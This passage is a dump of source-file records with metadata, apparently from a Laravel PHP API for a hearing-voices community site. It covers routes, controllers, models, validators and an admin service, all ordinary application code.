"content_id": "a779500713c6ea57beba4ea769b095784f43f6b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1399,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 63,
"path": "/app/Providers/MacroServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\ServiceProvider;\nuse Illuminate\\Validation\\Rule;\n\nclass MacroServiceProvider extends ServiceProvider\n{\n /**\n * Register services.\n */\n public function register(): void\n {\n $this->registerRequestMacros();\n $this->registerRuleMacros();\n }\n\n /**\n * Macros for the Request class.\n */\n protected function registerRequestMacros(): void\n {\n Request::macro('hasFilter', function (string $filter, $value = null): bool {\n $hasFilter = $this->has(\"filter.{$filter}\");\n\n if ($value === null) {\n return $hasFilter;\n }\n\n return $hasFilter && $this->input(\"filter.{$filter}\") === $value;\n });\n\n Request::macro('doesntHaveFilter', function (string $filter, $value = null): bool {\n return !$this->hasFilter($filter, $value);\n });\n }\n\n /**\n * Macros for the Rule class.\n */\n protected function registerRuleMacros(): void\n {\n Rule::macro('min', function (int $min): string {\n return \"min:{$min}\";\n });\n\n Rule::macro('max', function (int $max): string {\n return \"max:{$max}\";\n });\n }\n\n /**\n * Bootstrap services.\n */\n public function boot(): void\n {\n //\n }\n}\n"
},
{
"alpha_fraction": 0.5665990710258484,
"alphanum_fraction": 0.5686274766921997,
"avg_line_length": 25.89090919494629,
"blob_id": "f5b46b48b441ae8f2178a8508264423ffcdd756a",
"content_id": "14e8819f2578f7504610a90dfa289126ed651a2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1479,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 55,
"path": "/app/Http/Controllers/Auth/EndUser/VerificationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Auth\\EndUser;\n\nuse App\\Http\\Controllers\\WebController;\nuse Illuminate\\Foundation\\Auth\\VerifiesEmails;\nuse Illuminate\\Http\\Request;\n\nclass VerificationController extends WebController\n{\n /*\n |--------------------------------------------------------------------------\n | Email Verification Controller\n |--------------------------------------------------------------------------\n |\n | This controller is responsible for handling email verification for any\n | user that recently registered with the application. Emails may also\n | be re-sent if the user didn't receive the original email message.\n |\n */\n\n use VerifiesEmails;\n\n /**\n * Where to redirect users after verification.\n *\n * @var string\n */\n protected $redirectTo = '/';\n\n /**\n * VerificationController constructor.\n */\n public function __construct()\n {\n $this->middleware('auth:web');\n $this->middleware('signed')->only('verify');\n $this->middleware('throttle:6,1')->only('verify', 'resend');\n }\n\n /**\n * Show the email verification notice.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Response\n */\n public function show(Request $request)\n {\n return $request->user('web')->hasVerifiedEmail()\n ? redirect($this->redirectPath())\n : view('end-user.auth.verify-email');\n }\n}\n"
},
{
"alpha_fraction": 0.5950782895088196,
"alphanum_fraction": 0.5961968898773193,
"avg_line_length": 29.827587127685547,
"blob_id": "7dcd6bc3a429f1082b40976bfc214aa34346b97d",
"content_id": "8d1e8d935eae8a7d7046d8b1020f27ff2f36a475",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 894,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 29,
"path": "/routes/passport.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\nRoute::namespace('App\\\\Http\\\\Controllers\\\\Passport')->group(\n function (): void {\n Route::get('/authorize', 'AuthorizationController@authorize')\n ->name('authorizations.authorize')\n ->middleware(['web', 'auth:web']);\n }\n);\n\nRoute::namespace('Laravel\\\\Passport\\\\Http\\\\Controllers')->group(\n function (): void {\n Route::post('/authorize', 'ApproveAuthorizationController@approve')\n ->name('authorizations.approve')\n ->middleware(['web', 'auth:web']);\n\n Route::delete('/authorize', 'DenyAuthorizationController@deny')\n ->name('authorizations.deny')\n ->middleware(['web', 'auth:web']);\n\n Route::post('/token', 'AccessTokenController@issueToken')\n ->name('token')\n ->middleware(['throttle']);\n }\n);\n"
},
{
"alpha_fraction": 0.5432020425796509,
"alphanum_fraction": 0.5435196757316589,
"avg_line_length": 36.03529357910156,
"blob_id": "33f4d0913c04b940a6d3831d86b9b73d846c8c5a",
"content_id": "692ecf1faf89ebe06d8e6b2d3dd4bf5467a836a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3148,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 85,
"path": "/routes/web.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\n/*\n|--------------------------------------------------------------------------\n| Web Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register web routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| contains the \"web\" middleware group. Now create something great!\n|\n*/\n\nRoute::get('/', 'LandingController')\n ->name('landing');\n\nRoute::prefix('docs')\n ->group(\n function (): void {\n Route::get('/', 'DocsController@index')\n ->name('docs.index');\n Route::get('/openapi.json', 'DocsController@openApi')\n ->name('docs.openapi');\n }\n );\n\nRoute::prefix('auth/admin')\n ->as('auth.admin.')\n ->namespace('Auth\\\\Admin')\n ->group(\n function (): void {\n Route::get('login', 'LoginController@showLoginForm')\n ->name('login');\n Route::post('login', 'LoginController@login');\n Route::get('login/code', 'LoginController@showOtpForm')\n ->name('login.code');\n Route::post('login/code', 'LoginController@otp');\n Route::post('logout', 'LoginController@logout')\n ->name('logout');\n\n Route::get('password/reset', 'ForgotPasswordController@showLinkRequestForm')\n ->name('password.request');\n Route::post('password/email', 'ForgotPasswordController@sendResetLinkEmail')\n ->name('password.email');\n\n Route::get('password/reset/{token}', 'ResetPasswordController@showResetForm')\n ->name('password.reset');\n Route::post('password/reset', 'ResetPasswordController@reset')\n ->name('password.update');\n }\n );\n\nRoute::prefix('auth/end-user')\n ->as('auth.end-user.')\n ->namespace('Auth\\\\EndUser')\n ->group(\n function (): void {\n Route::get('login', 'LoginController@showLoginForm')\n ->name('login');\n Route::post('login', 'LoginController@login');\n Route::post('logout', 'LoginController@logout')\n ->name('logout');\n\n Route::get('password/reset', 'ForgotPasswordController@showLinkRequestForm')\n ->name('password.request');\n Route::post('password/email', 'ForgotPasswordController@sendResetLinkEmail')\n ->name('password.email');\n\n Route::get('password/reset/{token}', 'ResetPasswordController@showResetForm')\n ->name('password.reset');\n Route::post('password/reset', 'ResetPasswordController@reset')\n ->name('password.update');\n\n Route::get('email/verify', 'VerificationController@show')\n ->name('verification.notice');\n Route::get('email/verify/{id}', 'VerificationController@verify')\n ->name('verification.verify');\n Route::get('email/resend', 'VerificationController@resend')\n ->name('verification.resend');\n }\n );\n"
},
{
"alpha_fraction": 0.6708984375,
"alphanum_fraction": 0.671875,
"avg_line_length": 29.117647171020508,
"blob_id": "50ec7a7e679de25b5353e72c6708d67722b77560",
"content_id": "5a9c93a3395c04cd5c98023226a7303df815483a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1024,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/app/Docs/Operations/Admins/DestroyAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\n\nclass DestroyAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific admin')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->responses(\n ResourceDeletedResponse::create(null, 'admin')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6422487497329712,
"alphanum_fraction": 0.6439523100852966,
"avg_line_length": 19.964284896850586,
"blob_id": "67f6f04deafb3b6e8b1429aad4ca5f523f212e06",
"content_id": "b42dc3cf519b8c15eead8d43eb065970cf4759e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 587,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Notification.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Notification extends Model\n{\n use Mutators\\NotificationMutators;\n use Relationships\\NotificationRelationships;\n use Scopes\\NotificationScopes;\n\n const CHANNEL_EMAIL = 'email';\n const CHANNEL_SMS = 'sms';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'sent_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n ];\n}\n"
},
{
"alpha_fraction": 0.6170212626457214,
"alphanum_fraction": 0.6180850863456726,
"avg_line_length": 20.363636016845703,
"blob_id": "18799df2fb8045638567e6843a79405dd4a90ca0",
"content_id": "78f5d556abdbc2c33f6626fc84689e1123649110",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 940,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 44,
"path": "/app/VariableSubstitution/Email/EndUser/PasswordResetSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\EndUser;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass PasswordResetSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * @var string\n */\n protected $passwordResetUrl;\n\n /**\n * PasswordResetSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n * @param string $passwordResetUrl\n */\n public function __construct(EndUser $endUser, string $passwordResetUrl)\n {\n $this->endUser = $endUser;\n $this->passwordResetUrl = $passwordResetUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'PASSWORD_RESET_URL' => $this->passwordResetUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5995864868164062,
"alphanum_fraction": 0.6085458397865295,
"avg_line_length": 29.22916603088379,
"blob_id": "e3c112bd9b2fc0a433e8a7daf51cae240c025b1c",
"content_id": "7dfce835bb69a7d8cf84567ddd850ae16f539866",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1451,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 48,
"path": "/app/Http/Resources/TagResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Tag $resource\n */\nclass TagResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'parent_tag_id' => $this->resource->parent_tag_id,\n 'name' => $this->resource->name,\n 'public_contributions_count' => $this->getPublicContributionsCount(),\n 'created_at' => $this->resource->created_at->toIso8601String(),\n 'updated_at' => $this->resource->updated_at->toIso8601String(),\n 'deleted_at' => optional($this->resource->deleted_at)->toIso8601String(),\n ];\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPublicContributionsCount(): int\n {\n return $this->public_contributions_count ?? (int)$this->whenLoaded(\n 'publicContributions',\n count($this->resource->publicContributions),\n $this->resource->publicContributions()->count()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6340113878250122,
"alphanum_fraction": 0.6343368887901306,
"avg_line_length": 35.5773811340332,
"blob_id": "f4017a9ff5d2530ad4e995604805c754b41cef11",
"content_id": "6821bf1bb9c90876ef87b6b39b8a399ecde0ef7d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 6145,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 168,
"path": "/app/Http/Controllers/V1/ContributionController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Contribution\\TagIdsFilter;\nuse App\\Http\\Requests\\Contribution\\IndexContributionRequest;\nuse App\\Http\\Requests\\Contribution\\StoreContributionRequest;\nuse App\\Http\\Requests\\Contribution\\UpdateContributionRequest;\nuse App\\Http\\Resources\\ContributionResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Models\\Contribution;\nuse App\\Services\\ContributionService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass ContributionController extends ApiController\n{\n /**\n * @var \\App\\Services\\ContributionService\n */\n protected $contributionService;\n\n /**\n * ContributionController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\ContributionService $contributionService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n ContributionService $contributionService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index', 'show');\n $this->authorizeResource(Contribution::class);\n\n $this->contributionService = $contributionService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\IndexContributionRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(IndexContributionRequest $request): ResourceCollection\n {\n $isGuest = $request->user('api') === null;\n $isEndUser = optional($request->user('api'))->isEndUser();\n $endUser = optional($request->user('api'))->endUser;\n\n $baseQuery = Contribution::query()\n ->with('tags.publicContributions')\n ->when($isGuest, function (Builder $query): void {\n // When guest, filter only public.\n $query->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n })\n ->when(\n $isEndUser && $request->doesntHaveFilter('end_user_id'),\n function (Builder $query) use ($endUser): void {\n // When end user, filter only public and all of own.\n $query->where('contributions.status', '=', Contribution::STATUS_PUBLIC)\n ->orWhere('contributions.end_user_id', '=', $endUser->id);\n }\n );\n\n $contributions = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::exact('end_user_id'),\n Filter::custom('tag_ids', TagIdsFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all contributions.'));\n\n return ContributionResource::collection($contributions);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\StoreContributionRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreContributionRequest $request): JsonResource\n {\n $contribution = DB::transaction(function () use ($request): Contribution {\n return $this->contributionService->create([\n 'end_user_id' => $request->user('api')->endUser->id,\n 'content' => $request->input('content'),\n 'status' => $request->status,\n 'tags' => 
$request->input('tags.*.id'),\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created contribution [{$contribution->id}].\"));\n\n return new ContributionResource($contribution);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Contribution $contribution): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed contribution [{$contribution->id}].\"));\n\n return new ContributionResource(\n $contribution->load('tags.publicContributions')\n );\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\UpdateContributionRequest $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(\n UpdateContributionRequest $request,\n Contribution $contribution\n ): JsonResource {\n $contribution = DB::transaction(function () use ($request, $contribution): Contribution {\n return $this->contributionService->update($contribution, [\n 'content' => $request->input('content'),\n 'status' => $request->status,\n 'tags' => $request->input('tags.*.id'),\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated contribution [{$contribution->id}].\"));\n\n return new ContributionResource(\n $contribution->load('tags.publicContributions')\n );\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(Request $request, Contribution $contribution): ResourceDeletedResponse\n {\n DB::transaction(function () use ($contribution): void {\n $this->contributionService->delete($contribution);\n });\n\n event(EndpointInvoked::onDelete($request, \"Deleted contribution [{$contribution->id}].\"));\n\n return new ResourceDeletedResponse('contribution');\n }\n}\n"
},
{
"alpha_fraction": 0.5720250606536865,
"alphanum_fraction": 0.5725469589233398,
"avg_line_length": 38.91666793823242,
"blob_id": "6e368fe4e0ea36fcdcf89d701666ac254f7dc2c4",
"content_id": "9ad6f8e00bcf7f0a5d9564b5a728999618ec95db",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1916,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 48,
"path": "/app/Docs/Schemas/Contribution/ContributionSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Contribution;\n\nuse App\\Docs\\Schemas\\Tag\\TagSchema;\nuse App\\Models\\Contribution;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->description('This is only provided when the requesting user is an admin or the same end user.'),\n Schema::string('content'),\n Schema::string('excerpt'),\n Schema::string('status')\n ->enum(...(new Enum(Contribution::class))->getValues('STATUS')),\n Schema::string('changes_requested')\n ->description('This is only provided when the requesting user is an admin or the same end user.')\n ->nullable(),\n Schema::string('status_last_updated_at')\n ->format(static::FORMAT_DATE_TIME)\n ->description('This is only provided when the requesting user is an admin or the same end user.'),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::array('tags')\n ->items(TagSchema::create())\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6736053228378296,
"alphanum_fraction": 0.674437940120697,
"avg_line_length": 24.553192138671875,
"blob_id": "6b2e6e8d458d0aef34358446fe12d8c2d3639a8f",
"content_id": "550f7006447ba62e643e46f8cf13712f39bac278",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1201,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 47,
"path": "/app/Models/Relationships/TagRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\Tag;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait TagRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function parentTag(): BelongsTo\n {\n return $this->belongsTo(Tag::class, 'parent_tag_id');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function childTags(): HasMany\n {\n return $this->hasMany(Tag::class, 'parent_tag_id');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function contributions(): BelongsToMany\n {\n return $this->belongsToMany(Contribution::class, 'contribution_tag');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function publicContributions(): BelongsToMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n }\n}\n"
},
{
"alpha_fraction": 0.6157556176185608,
"alphanum_fraction": 0.618971049785614,
"avg_line_length": 16.77142906188965,
"blob_id": "401868f3926eb9cff4191c3b4b482bf71445e212",
"content_id": "5fe34eb2d0b0fd848d5cd61394250825c1d7a29c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 35,
"path": "/app/Models/Country.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Country extends Model\n{\n use Mutators\\CountryMutators;\n use Relationships\\CountryRelationships;\n use Scopes\\CountryScopes;\n\n /**\n * Indicates if the IDs are UUIDs.\n *\n * @var bool\n */\n protected $keyIsUuid = false;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * The primary key for the model.\n *\n * @var string\n */\n protected $primaryKey = 'alpha_2';\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "82cd6e772c07c999a66239799730d8acdd293d73",
"content_id": "03622768d0e658312dac9e04c807a32c0a86785c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 32,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 2,
"path": "/docker/troposphere/requirements.txt",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "troposphere==2.5.3\nawacs==0.8.1\n"
},
{
"alpha_fraction": 0.6963788270950317,
"alphanum_fraction": 0.6991643309593201,
"avg_line_length": 17.894737243652344,
"blob_id": "4c04627677f8502e179bc40d3144771ad415a501",
"content_id": "8ebc3b0cb69df7aca019b9223bdbb550707bda22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 359,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 19,
"path": "/app/Models/Relationships/FileRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\FileToken;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait FileRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function fileTokens(): HasMany\n {\n return $this->hasMany(FileToken::class);\n }\n}\n"
},
{
"alpha_fraction": 0.5116396546363831,
"alphanum_fraction": 0.5121457576751709,
"avg_line_length": 24.012659072875977,
"blob_id": "249c995e79cc7d72aa49c145381c72758b40dbbe",
"content_id": "783a8cde2f61e3053029bb428975e674a15e728d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1976,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 79,
"path": "/app/Services/AdminService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Admin\\AdminCreated;\nuse App\\Events\\Admin\\AdminDeleted;\nuse App\\Events\\Admin\\AdminUpdated;\nuse App\\Models\\Admin;\nuse App\\Models\\User;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass AdminService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Admin\n */\n public function create(array $data): Admin\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = Admin::create([\n 'name' => $data['name'],\n 'phone' => $data['phone'],\n 'user_id' => User::create([\n 'email' => $data['email'],\n 'password' => Hash::make($data['password']),\n 'email_verified_at' => Date::now(),\n ])->id,\n ]);\n\n event(new AdminCreated($admin));\n\n return $admin;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @param array $data\n * @return \\App\\Models\\Admin\n */\n public function update(Admin $admin, array $data): Admin\n {\n $admin->update([\n 'name' => $data['name'] ?? $admin->name,\n 'phone' => $data['phone'] ?? $admin->phone,\n ]);\n\n $admin->user->update([\n 'email' => $data['email'] ?? $admin->user->email,\n 'password' => $data['password'] !== null\n ? Hash::make($data['password'])\n : $admin->user->password,\n ]);\n\n event(new AdminUpdated($admin));\n\n return $admin;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @throws \\Exception\n */\n public function delete(Admin $admin): void\n {\n /** @var \\App\\Models\\User $user */\n $user = $admin->user;\n $admin->delete();\n $user->audits()->delete();\n $user->notifications()->delete();\n $user->fileToken()->delete();\n $user->forceDelete();\n\n event(new AdminDeleted($admin));\n }\n}\n"
},
{
"alpha_fraction": 0.46038544178009033,
"alphanum_fraction": 0.4614560902118683,
"avg_line_length": 25.685714721679688,
"blob_id": "77ce206754ca4e158596dd7b49550939385525f7",
"content_id": "6575183973d0ba80e312a2b0cb5e4441a7b615ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 934,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 35,
"path": "/app/Http/Requests/Contribution/IndexContributionRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Contribution;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass IndexContributionRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'filter[end_user_id]' => [\n 'bail',\n function (string $attribute, string $endUserIds, callable $fail): void {\n if (!$this->user('api')->isEndUser()) {\n return;\n }\n\n foreach (explode(',', $endUserIds) as $endUserId) {\n if ($this->user('api')->endUser->id !== $endUserId) {\n $fail('End users can only filter by their own ID.');\n }\n }\n },\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5143442749977112,
"alphanum_fraction": 0.5204917788505554,
"avg_line_length": 24.6842098236084,
"blob_id": "c80aef375d38d6cb08c008f310c568e39f8b1a61",
"content_id": "309ff895fa3f73b3f021e0b4f0ce207b9e1a5b49",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 976,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 38,
"path": "/app/Http/Requests/Contribution/StoreContributionRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Contribution;\n\nuse App\\Models\\Contribution;\nuse App\\Rules\\Words;\nuse App\\Support\\Enum;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass StoreContributionRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @throws \\ReflectionException\n * @return array\n */\n public function rules(): array\n {\n return [\n 'content' => ['bail', 'required', 'string', 'max:10000', new Words()],\n 'status' => [\n 'bail',\n 'required',\n 'string',\n Rule::in(\n (new Enum(Contribution::class))->getValues('STATUS')\n ),\n ],\n 'tags' => ['bail', 'present', 'array'],\n 'tags.*' => ['bail', 'array'],\n 'tags.*.id' => ['bail', 'exists:tags,id', 'distinct'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5490092039108276,
"alphanum_fraction": 0.549186110496521,
"avg_line_length": 29.06382942199707,
